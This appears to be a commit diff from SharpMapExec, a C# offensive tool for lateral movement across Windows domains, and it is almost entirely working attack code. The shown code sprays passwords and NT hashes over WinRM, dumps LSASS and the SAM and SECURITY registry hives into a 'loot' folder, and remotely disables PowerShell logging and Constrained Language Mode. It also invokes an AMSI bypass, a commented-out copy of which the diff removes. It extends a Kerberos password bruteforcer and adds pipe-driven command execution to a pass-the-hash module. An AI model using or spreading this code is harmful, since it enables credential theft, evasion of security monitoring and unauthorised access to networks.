2	-	using System;
3	-	using System.Collections.Generic;
4	-	using System.IO;
5	-	using System.Linq;
6	-	using System.Threading.Tasks;
7	-	using static SharpMapExec.Helpers.SecurityContext;
8	-
9	-	namespace SharpMapExec.Lib
10	-	{
11	-	public class ntlmwinrm
12	-	{
13	-	public static void NtlmWinRm<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument,string path, string destination, List<string> flags)
14	-	{
15	-	if (module.Contains("exec") && moduleargument.Length == 0)
16	-	{
17	-	Console.WriteLine("[-] Missing exec argument");
18	-	return;
19	-	}
20	-	if (module.Contains("assembly") && !File.Exists(path))
21	-	{
22	-	Console.WriteLine("[-] Missing assembly path");
23	-	return;
24	-	}
25	-	if (module.Contains("download") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
26	-	{
27	-	Console.WriteLine("[-] Need path and destination");
28	-	return;
29	-	}
30	-	if (module.Contains("upload") && (String.IsNullOrEmpty(path) \|\| String.IsNullOrEmpty(destination)))
31	-	{
32	-	Console.WriteLine("[-] Need path and destination");
33	-	return;
34	-	}
35	-	//StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags);
36	-	var listOfTasks = new List<Task>();
37	-	listOfTasks.Add(new Task(() => StartJob(users, domain, secrets, computernames, module, moduleargument, path, destination, flags)));
38	-	Tasks.StartAndWaitAllThrottled(listOfTasks, 1);
39	-	}
40	-
41	-	public static void StartJob<T>(string[] users, string domain, T secrets, string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
42	-	{
43	-	string[] passwords;
44	-	if (typeof(T) == typeof(NTHash))
45	-	{
46	-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Nthash").GetValue(secrets, null);
47	-	foreach (string user in users)
48	-	{
49	-	foreach (string password in passwords)
50	-	{
51	-	Console.WriteLine("------------------");
52	-	Console.WriteLine(string.Format("[*] User: {0}", user));
53	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
54	-	Console.WriteLine(string.Format("[*] secret: {0}", password));
55	-	Console.WriteLine();
56	-	SetThreadToken(user, domain, password);
57	-	foreach (string computername in computernames)
58	-	{
59	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
60	-	if (!Misc.CheckHostPort(computername, 5985))
61	-	{
62	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
63	-	Console.WriteLine();
64	-	continue;
65	-	}
66	-	if (!Directory.Exists(Path.Combine("loot", computername)))
67	-	{
68	-	Directory.CreateDirectory(Path.Combine("loot", computername));
69	-	}
70	-	if (module.Length == 0 \|\| module.Contains("exec"))
71	-	{
72	-	Wsman.CheckLocalAdmin(computername, moduleargument, flags);
73	-	}
74	-	else if (module.Contains("comsvcs"))
75	-	{
76	-	Wsman.InvokeComSvcsLsassDump(computername);
77	-	}
78	-	else if (module.Contains("secrets") \|\| module.Contains("secret"))
79	-	{
80	-	Wsman.GetSecrets(computername);
81	-	}
82	-	else if (module.Contains("assembly"))
83	-	{
84	-	Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
85	-	}
86	-	else if (module.Contains("download"))
87	-	{
88	-	Wsman.CopyFile(computername, path, destination);
89	-	}
90	-	else if (module.Contains("upload"))
91	-	{
92	-	Wsman.UploadFile(computername, path, destination);
93	-	}
94	-	Console.WriteLine("");
95	-	}
96	-	}
97	-	}
98	-	}
99	-	else if (typeof(T) == typeof(ClearText))
100	-	{
101	-	passwords = (string[])secrets.GetType().GetProperties().Single(pi => pi.Name == "Cleartext").GetValue(secrets, null);
102	-	foreach (string user in users)
103	-	{
104	-	foreach (string password in passwords)
105	-	{
106	-	Console.WriteLine("------------------");
107	-	Console.WriteLine(string.Format("[*] User: {0}", user));
108	-	Console.WriteLine(string.Format("[*] domain: {0}", domain));
109	-	Console.WriteLine(string.Format("[*] secret: {0}", password));
110	-	Console.WriteLine();
111	-	using (new Impersonator.Impersonation(domain, user, password))
112	-	{
113	-	foreach (string computername in computernames)
114	-	{
115	-	Console.WriteLine(String.Format("[*] Checking {0}", computername));
116	-	if (!Misc.CheckHostPort(computername, 5985))
117	-	{
118	-	Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
119	-	Console.WriteLine();
120	-	continue;
121	-	}
122	-	if (!Directory.Exists(Path.Combine("loot", computername)))
123	-	{
124	-	Directory.CreateDirectory(Path.Combine("loot", computername));
125	-	}
126	-	if (module.Length == 0 \|\| module.Contains("exec"))
127	-	{
128	-	Wsman.CheckLocalAdmin(computername, moduleargument, flags);
129	-	}
130	-	else if (module.Contains("comsvcs"))
131	-	{
132	-	Wsman.InvokeComSvcsLsassDump(computername);
133	-	}
134	-	else if (module.Contains("secrets") \|\| module.Contains("secret"))
135	-	{
136	-	Wsman.GetSecrets(computername);
137	-	}
138	-	else if (module.Contains("assembly"))
139	-	{
140	-	Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
141	-	}
142	-	else if (module.Contains("download"))
143	-	{
144	-	Wsman.CopyFile(computername, path, destination);
145	-	}
146	-	else if (module.Contains("upload"))
147	-	{
148	-	Wsman.UploadFile(computername, path, destination);
149	-	}
150	-	Console.WriteLine("");
151	-	}
152	-	}
153	-	}
154	-	}
155	-	}
156	-	}
157	-	}
158	-	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Reg32.cs

1	+	using System;
2	+	using System.Collections.Generic;
3	+	using System.Linq;
4	+	using System.Text;
5	+	using System.Threading.Tasks;
6	+	using Microsoft.Win32;
7	+
8	+	namespace SharpMapExec.Lib
9	+	{
10	+	class Reg32
11	+	{
12	+
13	+	public static bool CheckLocalAdmin(string computername)
14	+	{
15	+	try
16	+	{
17	+	RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(RegistryHive.LocalMachine, computername);
18	+	string[] subkeys = environmentKey.OpenSubKey("SOFTWARE").GetValueNames();
19	+	Console.WriteLine(String.Format(" [+] Local Admin on {0}", computername));
20	+	return true;
21	+	}
22	+	catch (System.UnauthorizedAccessException e)
23	+	{
24	+	Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
25	+	return false;
26	+	}
27	+	}
28	+
29	+	public static bool regValueExists(string computername, RegistryHive hive, string subKeyName, string keyName)
30	+	{
31	+	try
32	+	{
33	+	RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
34	+	string[] subkeys = environmentKey.OpenSubKey(subKeyName).GetValueNames();
35	+	string value = subkeys.FirstOrDefault(item => item.Contains(keyName));
36	+	environmentKey.Close();
37	+	if (string.IsNullOrEmpty(value))
38	+	{
39	+	return false;
40	+	}
41	+	else
42	+	{
43	+	return true;
44	+	}
45	+	}
46	+	catch (System.UnauthorizedAccessException e)
47	+	{
48	+	Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
49	+	return false;
50	+	}
51	+	catch (Exception e)
52	+	{
53	+	//Console.WriteLine("[-] {0}", e.ToString());
54	+	return false;
55	+	}
56	+	}
57	+
58	+	public static string readRegValue(string computername, RegistryHive hive, string subKeyName, string keyName)
59	+	{
60	+	try
61	+	{
62	+	RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername);
63	+	string value = (string)environmentKey.OpenSubKey(subKeyName).GetValue(keyName);
64	+	environmentKey.Close();
65	+	return value;
66	+	}
67	+	catch (System.UnauthorizedAccessException e)
68	+	{
69	+	Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
70	+	return "";
71	+	}
72	+	catch (Exception e)
73	+	{
74	+	//Console.WriteLine("[-] {0}", e.ToString());
75	+	return "";
76	+	}
77	+	}
78	+
79	+	public static bool setRegValue(string computername, RegistryHive hive, string subKeyName, string keyName, string valueName, RegistryValueKind valueKind)
80	+	{
81	+	try
82	+	{
83	+	RegistryKey environmentKey = RegistryKey.OpenRemoteBaseKey(hive, computername).OpenSubKey(subKeyName, true);
84	+	environmentKey.SetValue(keyName, valueName, valueKind);
85	+	environmentKey.Close();
86	+	if (readRegValue(computername, hive, subKeyName, keyName) == valueName)
87	+	{
88	+	return true;
89	+	}
90	+	else
91	+	{
92	+	return false;
93	+	}
94	+	}
95	+	catch (System.UnauthorizedAccessException e)
96	+	{
97	+	Console.WriteLine(String.Format(" [-] Failed to authenticate on {0}", computername));
98	+	return false;
99	+	}
100	+	catch (Exception e)
101	+	{
102	+	//Console.WriteLine("[-] {0}", e.ToString());
103	+	return false;
104	+	}
105	+	}
106	+
107	+	public static void disable_pslockdown(string computername)
108	+	{
109	+	if (!regValueExists(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy"))
110	+	{
111	+	Console.WriteLine("[*] CLM not enabled");
112	+	return;
113	+	}
114	+
115	+	string value = readRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
116	+	Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
117	+
118	+	if(value == "8")
119	+	{
120	+	return;
121	+	}
122	+
123	+	bool result = setRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy", "8", RegistryValueKind.String);
124	+	if (result)
125	+	{
126	+	Console.WriteLine(" [+] Constrained Language Mode Disabled");
127	+	}
128	+	else
129	+	{
130	+	Console.WriteLine(" [-] Failed To Disable Constrained Language Mode");
131	+	}
132	+	}
133	+
134	+	public static void check_pslockdown(string computername)
135	+	{
136	+	if (!regValueExists(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy"))
137	+	{
138	+	Console.WriteLine("[*] CLM not enabled");
139	+	return;
140	+	}
141	+
142	+	string value = readRegValue(computername, RegistryHive.LocalMachine, "SYSTEM\\CurrentControlSet\\Control\\Session Manager\\Environment", "__PSLockdownPolicy");
143	+	Console.WriteLine(" [*] __PSLockdownPolicy value: {0}", value);
144	+	}
145	+
146	+	public static void disable_pslogging(string computername)
147	+	{
148	+	Dictionary<string, string> keys = new Dictionary<string, string>
149	+	{
150	+	{ "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
151	+	{ "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
152	+	{ "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
153	+	{ "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
154	+	};
155	+	foreach (var key in keys)
156	+	{
157	+	if (!regValueExists(computername, RegistryHive.LocalMachine, key.Value, key.Key))
158	+	{
159	+	Console.WriteLine("[*] {0} not enabled", key.Key);
160	+	continue;
161	+	}
162	+
163	+	string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
164	+	Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
165	+
166	+	if(value == "0")
167	+	{
168	+	continue;
169	+	}
170	+
171	+	bool result = setRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key, "0", RegistryValueKind.DWord);
172	+	if (result)
173	+	{
174	+	Console.WriteLine(" [+] {0} Disabled", key.Key);
175	+	}
176	+	else
177	+	{
178	+	Console.WriteLine(" [-] Failed To Disable {0}", key.Key);
179	+	}
180	+	}
181	+	}
182	+
183	+	public static void check_pslogging(string computername)
184	+	{
185	+	Dictionary<string, string> keys = new Dictionary<string, string>
186	+	{
187	+	{ "EnableModuleLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ModuleLogging" },
188	+	{ "EnableTranscripting", @"Software\Policies\Microsoft\Windows\PowerShell\Transcription" },
189	+	{ "EnableScriptBlockLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
190	+	{ "EnableScriptBlockInvocationLogging", @"Software\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging" },
191	+	};
192	+	foreach (var key in keys)
193	+	{
194	+	if (!regValueExists(computername, RegistryHive.LocalMachine, key.Value, key.Key))
195	+	{
196	+	Console.WriteLine("[*] {0} not enabled", key.Key);
197	+	continue;
198	+	}
199	+
200	+	string value = readRegValue(computername, RegistryHive.LocalMachine, key.Value, key.Key);
201	+	Console.WriteLine(" [*] Current {0} value: {1}", key.Key, value);
202	+
203	+	}
204	+	}
205	+	}
206	+	}
207	+

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Scan.cs

1	+	using Microsoft.Management.Infrastructure;
2	+	using SharpMapExec.Helpers;
3	+	using System;
4	+	using System.Collections.Generic;
5	+	using System.IO;
6	+
7	+	namespace SharpMapExec.Lib
8	+	{
9	+	internal class Scan
10	+	{
11	+	public static void SMB(string[] computernames, string module)
12	+	{
13	+	foreach (string computername in computernames)
14	+	{
15	+	try
16	+	{
17	+	Console.WriteLine(String.Format("[*] Checking {0}", computername));
18	+	if (!Misc.CheckHostPort(computername, 445))
19	+	{
20	+	Console.WriteLine(String.Format("[-] Could Not Reach {0}:445", computername));
21	+	Console.WriteLine();
22	+	continue;
23	+	}
24	+	if (!Directory.Exists(Path.Combine("loot", computername)))
25	+	{
26	+	Directory.CreateDirectory(Path.Combine("loot", computername));
27	+	}
28	+	Smb.CheckSMBVersion(computername);
29	+	Smb.CheckOsVersion(computername);
30	+	Smb.CheckLocalAdmin(computername, module);
31	+	Console.WriteLine("");
32	+	}
33	+	catch (Exception e)
34	+	{
35	+	Console.WriteLine("[-] {0}:445 - {1}", computername, e.ToString());
36	+	}
37	+	}
38	+	}
39	+
40	+	public static void WINRM(string[] computernames, string module, string moduleargument, string path, string destination, List<string> flags)
41	+	{
42	+	foreach (string computername in computernames)
43	+	{
44	+	try
45	+	{
46	+	Console.WriteLine(String.Format("[*] Checking {0}", computername));
47	+	if (!Misc.CheckHostPort(computername, 5985))
48	+	{
49	+	Console.WriteLine(String.Format("[-] Could Not Reach {0}:5985", computername));
50	+	Console.WriteLine();
51	+	continue;
52	+	}
53	+	if (module.Length == 0 \|\| module.Contains("exec"))
54	+	{
55	+	Wsman.CheckLocalAdmin(computername, moduleargument, flags);
56	+	}
57	+	else if (module.Contains("comsvcs"))
58	+	{
59	+	Wsman.InvokeComSvcsLsassDump(computername);
60	+	}
61	+	else if (module.Contains("secrets") \|\| module.Contains("secret"))
62	+	{
63	+	Wsman.GetSecrets(computername);
64	+	}
65	+	else if (module.Contains("assembly"))
66	+	{
67	+	Wsman.ExecuteAssembly(computername, path, moduleargument, flags);
68	+	}
69	+	else if (module.Contains("download"))
70	+	{
71	+	Wsman.CopyFile(computername, path, destination);
72	+	}
73	+	else if (module.Contains("upload"))
74	+	{
75	+	Wsman.UploadFile(computername, path, destination);
76	+	}
77	+	Console.WriteLine("");
78	+	}
79	+	catch (Exception e)
80	+	{
81	+	Console.WriteLine("[-] {0}:5985 - {1}", computername, e.ToString());
82	+	}
83	+	}
84	+	}
85	+
86	+	public static void CIM(CimSession cimSession, string module)
87	+	{
88	+	try
89	+	{
90	+	Console.WriteLine(String.Format("[*] Checking {0}", cimSession.ComputerName));
91	+	if (!cimSession.TestConnection(out CimInstance instance, out CimException exception))
92	+	{
93	+	Console.WriteLine(String.Format("[-] Could Not Reach {0} - {1}", cimSession.ComputerName, exception));
94	+	Console.WriteLine();
95	+	return;
96	+	}
97	+	if (module.Length == 0)
98	+	{
99	+	Cim.CheckLocalAdmin(cimSession);
100	+	}
101	+	else if (module.Contains("enable_winrm"))
102	+	{
103	+	Cim.enable_winrm(cimSession);
104	+	}
105	+	else if (module.Contains("disable_winrm"))
106	+	{
107	+	Cim.disable_winrm(cimSession);
108	+	}
109	+	else if (module.Contains("check_pslockdown"))
110	+	{
111	+	Cim.check_pslockdown(cimSession);
112	+	}
113	+	else if (module.Contains("check_pslogging"))
114	+	{
115	+	Cim.check_pslogging(cimSession);
116	+	}
117	+	else if (module.Contains("disable_pslockdown"))
118	+	{
119	+	Cim.disable_pslockdown(cimSession);
120	+	}
121	+	else if (module.Contains("disable_pslogging"))
122	+	{
123	+	Cim.disable_pslogging(cimSession);
124	+	}
125	+	Console.WriteLine("");
126	+	}
127	+	catch (Exception e)
128	+	{
129	+	Console.WriteLine("[-] {0} - {1}", cimSession.ComputerName, e.ToString());
130	+	}
131	+	}
132	+
133	+	public static void REG32(string[] computernames, string module)
134	+	{
135	+	foreach (string computername in computernames)
136	+	{
137	+	Console.WriteLine(module);
138	+
139	+	try
140	+	{
141	+	Console.WriteLine(String.Format("[*] Checking {0}", computername));
142	+	if (!Misc.CheckHostPort(computername, 445))
143	+	{
144	+	Console.WriteLine(String.Format("[-] Could Not Reach {0}:135", computername));
145	+	Console.WriteLine();
146	+	continue;
147	+	}
148	+	if (!Reg32.CheckLocalAdmin(computername))
149	+	{
150	+	continue;
151	+	}
152	+	else if (module.Contains("check_pslockdown"))
153	+	{
154	+	Reg32.check_pslockdown(computername);
155	+	}
156	+	else if (module.Contains("check_pslogging"))
157	+	{
158	+	Reg32.check_pslogging(computername);
159	+	}
160	+	else if (module.Contains("disable_pslockdown"))
161	+	{
162	+	Reg32.disable_pslockdown(computername);
163	+	}
164	+	else if (module.Contains("disable_pslogging"))
165	+	{
166	+	Reg32.disable_pslogging(computername);
167	+	}
168	+	Console.WriteLine("");
169	+	}
170	+	catch (Exception e)
171	+	{
172	+	Console.WriteLine("[-] {0} - {1}", computername, e.ToString());
173	+	}
174	+	}
175	+	}
176	+	}
177	+	}

■ ■ ■ ■ ■ ■

SharpMapExec/Lib/Wsman.cs

		skipped 112 lines
113	113		using (var powershell = PowerShell.Create())
114	114		{
115	115		powershell.Runspace = runspace;
	116	+	powershell.AddScript("if(get-module psreadline -all){remove-module psreadline -Force}");
116	117		if (AmsiBypass)
117	118		{
118	119		string amsi = AmsiFail.GetPayload();
119	120		powershell.AddScript(amsi);
120		-	//powershell.AddScript("[Ref].Assembly.GetType('System.Management.Automation.' + ([char]65) + 'm' + 's' + ($PSHOmE[4]) + 'Utils').GetField('a' + 'm' + 's' + 'i' + 'InitFailed','NonPublic,Static').SetValue(0,[bool]1)");
121	121		}
122	122		powershell.AddScript(argument);
123	123		result = powershell.Invoke();
		skipped 104 lines
228	228		}
229	229		try
230	230		{
231		-	string data = Compress(File.ReadAllBytes(path));
	231	+	byte[] binary = File.ReadAllBytes(path);
	232	+	string data = Compress(binary);
232	233		(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, PsFunction.UploadFile(data, destination), false, auth, scheme, true);
233	234		foreach (PSObject obj in result)
234	235		{
235	236		if (obj.ToString().Length == 0)
236	237		{
237	238		Console.WriteLine(" [-] Upload Failed");
	239	+	return;
238	240		}
239	241		}
	242	+	Console.WriteLine(String.Format(" [+] Copied {0}kb to {1}", binary.ToArray().Length, destination));
240	243		}
241	244		catch (Exception e) // Connecting to remote server 192.168.1.10 failed with the following error message : Access is denied. For more information, see the about_Remote_Troubleshooting Help topic
242	245		{
		skipped 79 lines
322	325
323	326		if (flags.Contains("system"))
324	327		{
325		-	caller = PsFunction.RunAsSystem(randomPath);
326		-	UploadContent(computer, command, randomPath, auth, scheme);
	328	+	caller = PsFunction.RunAsSystem(command);
327	329		}
328	330		else if (flags.Contains("delegwalk"))
329	331		{
330		-	caller = PsFunction.RunDelegationWalk(randomPath);
331		-	UploadContent(computer, command, randomPath, auth, scheme);
	332	+	caller = PsFunction.RunDelegationWalk(command);
332	333		}
333	334		else
334	335		{
335	336		caller = command;
336	337		}
	338	+
	339	+	//Console.WriteLine(command);
	340	+	//Console.WriteLine(caller);
337	341
338	342		try
339	343		{
		skipped 36 lines
376	380		string argument = string.Format(@"start-process powershell -WindowStyle Hidden -ArgumentList '-NoP -enc {0} ' -wait ; test-path {1}", Convert.ToBase64String(Encoding.Unicode.GetBytes(ecmd)), path);
377	381		//string argument = "C:\\Windows\\System32\\rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump (Get-Process lsass).Id C:\\windows\\temp\\Coredump.dmp full; Wait-Process rundll32";
378	382		string destination = Path.Combine("loot", computer, "lsass.dmp");
	383	+	if (!Directory.Exists(Path.Combine("loot", computer)))
	384	+	{
	385	+	Directory.CreateDirectory(Path.Combine("loot", computer));
	386	+	}
379	387		try
380	388		{
381	389		(Collection<PSObject> result, Collection<ErrorRecord> errors) = InvokeCommand(computer, argument, false, auth, scheme);
		skipped 40 lines
422	430		string sam = Path.Combine(destination, "sam.hive");
423	431		string sys = Path.Combine(destination, "system.hive");
424	432		string sec = Path.Combine(destination, "security.hive");
	433	+	if (!Directory.Exists(Path.Combine("loot", computer)))
	434	+	{
	435	+	Directory.CreateDirectory(Path.Combine("loot", computer));
	436	+	}
425	437
426	438		//Get registry hives
427	439		try
		skipped 231 lines

■ ■ ■ ■ ■ ■

SharpMapExec/Projects/Rubeus/lib/Bruteforcer.cs

		skipped 2 lines
3	3
4	4		namespace Rubeus
5	5		{
	6	+
6	7		public interface IBruteforcerReporter
7	8		{
8		-	void ReportValidPassword(string domain, string username, string password, byte[] ticket);
9		-
	9	+	void ReportValidPassword(string domain, string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE);
10	10		void ReportValidUser(string domain, string username);
11		-
12	11		void ReportInvalidUser(string domain, string username);
13		-
14	12		void ReportBlockedUser(string domain, string username);
15		-
16	13		void ReportKrbError(string domain, string username, KRB_ERROR krbError);
17	14		}
18	15
	16	+
19	17		public class Bruteforcer
20	18		{
	19	+
21	20		private string domain;
22	21		private string dc;
23	22		private IBruteforcerReporter reporter;
		skipped 40 lines
64	63		}
65	64		catch (KerberosErrorException ex)
66	65		{
67		-	this.HandleKerberosError(ex, username);
	66	+	return this.HandleKerberosError(ex, username, password);
68	67		}
69	68
70	69		return false;
		skipped 2 lines
73	72		private void GetUsernamePasswordTGT(string username, string password)
74	73		{
75	74		Interop.KERB_ETYPE encType = Interop.KERB_ETYPE.aes256_cts_hmac_sha1;
76		-	string salt = String.Format("{0}{1}", domain.ToUpper(), username.ToLower());
	75	+	string salt = String.Format("{0}{1}", domain.ToUpper(), username);
77	76
78	77		// special case for computer account salts
79	78		if (username.EndsWith("$"))
		skipped 10 lines
90	89		this.ReportValidPassword(username, password, TGT);
91	90		}
92	91
93		-	private void HandleKerberosError(KerberosErrorException ex, string username)
	92	+	private bool HandleKerberosError(KerberosErrorException ex, string username, string password)
94	93		{
	94	+
	95	+
95	96		KRB_ERROR krbError = ex.krbError;
	97	+	bool ret = false;
96	98
97	99		switch ((Interop.KERBEROS_ERROR)krbError.error_code)
98	100		{
99	101		case Interop.KERBEROS_ERROR.KDC_ERR_PREAUTH_FAILED:
100	102		this.ReportValidUser(username);
101	103		break;
102		-
103	104		case Interop.KERBEROS_ERROR.KDC_ERR_C_PRINCIPAL_UNKNOWN:
104	105		this.ReportInvalidUser(username);
105	106		break;
106		-
107	107		case Interop.KERBEROS_ERROR.KDC_ERR_CLIENT_REVOKED:
108	108		this.ReportBlockedUser(username);
109	109		break;
110		-
111	110		case Interop.KERBEROS_ERROR.KDC_ERR_ETYPE_NOTSUPP:
112	111		this.ReportInvalidEncryptionType(username, krbError);
113	112		break;
114		-
	113	+	case Interop.KERBEROS_ERROR.KDC_ERR_KEY_EXPIRED:
	114	+	this.ReportValidPassword(username, password, null, (Interop.KERBEROS_ERROR)krbError.error_code);
	115	+	ret = true;
	116	+	break;
115	117		default:
116	118		this.ReportKrbError(username, krbError);
117	119		throw ex;
118	120		}
	121	+	return ret;
119	122		}
120	123
121		-	private void ReportValidPassword(string username, string password, byte[] ticket)
	124	+	private void ReportValidPassword(string username, string password, byte[] ticket, Interop.KERBEROS_ERROR err = Interop.KERBEROS_ERROR.KDC_ERR_NONE)
122	125		{
	126	+
123	127		validCredentials.Add(username, password);
124	128		if (!validUsers.ContainsKey(username))
125	129		{
126	130		validUsers.Add(username, true);
127	131		}
128		-	this.reporter.ReportValidPassword(this.domain, username, password, ticket);
	132	+	this.reporter.ReportValidPassword(this.domain, username, password, ticket, err);
129	133		}
130	134
131	135		private void ReportValidUser(string username)
		skipped 36 lines
168	172		{
169	173		this.reporter.ReportKrbError(this.domain, username, krbError);
170	174		}
	175	+
171	176		}
172	177		}
	178	+

■ ■ ■ ■ ■ ■ ■

SharpMapExec/Projects/SharpKatz/Module/Ptp.cs

		skipped 3 lines
4	4		// License: BSD 3-Clause
5	5		//
6	6
	7	+	using Microsoft.Win32.SafeHandles;
7	8		using SharpKatz.Credential;
8	9		using System;
9	10		using System.Collections.Generic;
	11	+	using System.IO;
10	12		using System.Runtime.InteropServices;
	13	+	using System.Text;
11	14		using static SharpKatz.Module.SharpKerberos;
12	15		using static SharpKatz.Win32.Natives;
13	16
		skipped 101 lines
115	118		}
116	119		else if (!string.IsNullOrEmpty(user))
117	120		{
	121	+	//pipe for stdin and stdout
	122	+	var saHandles = new SECURITY_ATTRIBUTES();
	123	+	saHandles.nLength = Marshal.SizeOf(saHandles);
	124	+	saHandles.bInheritHandle = true;
	125	+	saHandles.lpSecurityDescriptor = IntPtr.Zero;
	126	+	IntPtr hStdOutRead;
	127	+	IntPtr hStdOutWrite;
	128	+	IntPtr hStdInRead;
	129	+	IntPtr hStdInWrite;
	130	+	// StdOut pipe
	131	+	CreatePipe(out hStdOutRead, out hStdOutWrite, ref saHandles, 999999);
	132	+	SetHandleInformation(hStdOutRead, HANDLE_FLAGS.INHERIT, 0);
	133	+	// StdIn pipe
	134	+	CreatePipe(out hStdInRead, out hStdInWrite, ref saHandles, 999999);
	135	+	SetHandleInformation(hStdInWrite, HANDLE_FLAGS.INHERIT, 0);
	136	+	//
118	137		PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
119		-	if (CreateProcessWithLogonW(user, "", domain, @"C:\Windows\System32\", binary, arguments, CreationFlags.CREATE_SUSPENDED, ref pi))
	138	+	STARTUPINFOEX si = new STARTUPINFOEX();
	139	+	si.StartupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFOEX));
	140	+	si.StartupInfo.hStdInput = hStdInRead;
	141	+	si.StartupInfo.hStdErr = hStdOutWrite;
	142	+	si.StartupInfo.hStdOutput = hStdOutWrite;
	143	+	si.StartupInfo.dwFlags = 0x00000001 \| 0x00000100;
	144	+	si.StartupInfo.wShowWindow = 0x0000;
	145	+	if (!Win32.Natives.CreateProcessWithLogonW(user, "", domain, LogonFlags.NetCredentialsOnly, @"C:\Windows\System32\cmd.exe", @"C:\Windows\System32\cmd.exe", CreationFlags.CREATE_SUSPENDED, 0, @"C:\Windows\System32\", ref si, out pi))
120	146		{
121	147		procid = pi.dwProcessId;
122	148		IntPtr hToken = IntPtr.Zero;
		skipped 15 lines
138	164		if (data.isReplaceOk)
139	165		{
140	166		NtResumeProcess(pi.hProcess);
	167	+	WriteToPipe(hStdInWrite, "/c whoami");
	168	+	Console.WriteLine(ReadFromPipe(pi.hProcess, hStdOutRead, Encoding.GetEncoding(GetConsoleOutputCP())));
141	169		return procid;
142	170		}
143	171		else
		skipped 45 lines
189	217		}
190	218		}
191	219
192		-	public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, CreationFlags cf, ref PROCESS_INFORMATION processInformation)
	220	+	public static bool WriteToPipe(IntPtr hStdInWrite, string command)
193	221		{
194		-	STARTUPINFO startupInfo = new STARTUPINFO();
195		-	startupInfo.cb = (uint)Marshal.SizeOf(typeof(STARTUPINFO));
196		-	processInformation = new PROCESS_INFORMATION();
197		-	if (!Win32.Natives.CreateProcessWithLogonW(username, domain, password,
198		-	LogonFlags.NetCredentialsOnly, path + binary, path + binary + " " + arguments, cf, 0, path, ref startupInfo, out processInformation))
	222	+	uint outbytes;
	223	+	byte[] cb = Encoding.ASCII.GetBytes(command + "\n\r");
	224	+	if (!WriteFile(hStdInWrite, cb, (uint)cb.Length, out outbytes, IntPtr.Zero))
199	225		{
	226	+	Console.WriteLine(" [!] WriteFile failed to execute!: {0}", Marshal.GetLastWin32Error());
200	227		return false;
201	228		}
202	229		return true;
203	230		}
	231	+
	232	+	public static string ReadFromPipe(IntPtr hProcess, IntPtr hStdOutRead, Encoding encoding)
	233	+	{
	234	+	SafeFileHandle safeHandle = new SafeFileHandle(hStdOutRead, false);
	235	+	var reader = new StreamReader(new FileStream(safeHandle, FileAccess.Read, 4096, false), encoding, true);
	236	+	string result = "";
	237	+	bool exit = false;
	238	+	try
	239	+	{
	240	+	do
	241	+	{
	242	+	if (WaitForSingleObject(hProcess, 100) == 0)
	243	+	{
	244	+	exit = true;
	245	+	}
	246	+
	247	+	char[] buf = null;
	248	+	int bytesRead;
	249	+
	250	+	uint bytesToRead = 0;
	251	+
	252	+	bool peekRet = PeekNamedPipe(hStdOutRead, IntPtr.Zero, IntPtr.Zero, IntPtr.Zero, ref bytesToRead, IntPtr.Zero);
	253	+
	254	+	if (peekRet == true && bytesToRead == 0)
	255	+	{
	256	+	if (exit == true)
	257	+	{
	258	+	break;
	259	+	}
	260	+	else
	261	+	{
	262	+	continue;
	263	+	}
	264	+	}
	265	+
	266	+	if (bytesToRead > 4096)
	267	+	bytesToRead = 4096;
	268	+
	269	+	buf = new char[bytesToRead];
	270	+	bytesRead = reader.Read(buf, 0, buf.Length);
	271	+	if (bytesRead > 0)
	272	+	{
	273	+	result += new string(buf);
	274	+	}
	275	+
	276	+	} while (true);
	277	+	reader.Close();
	278	+	}
	279	+	finally
	280	+	{
	281	+	if (!safeHandle.IsClosed)
	282	+	{
	283	+	safeHandle.Close();
	284	+	}
	285	+	}
	286	+	return result;
	287	+	}
	288	+
	289	+	//public static bool CreateProcessWithLogonW(string username, string password, string domain, string path, string binary, string arguments, CreationFlags cf, ref PROCESS_INFORMATION processInformation)
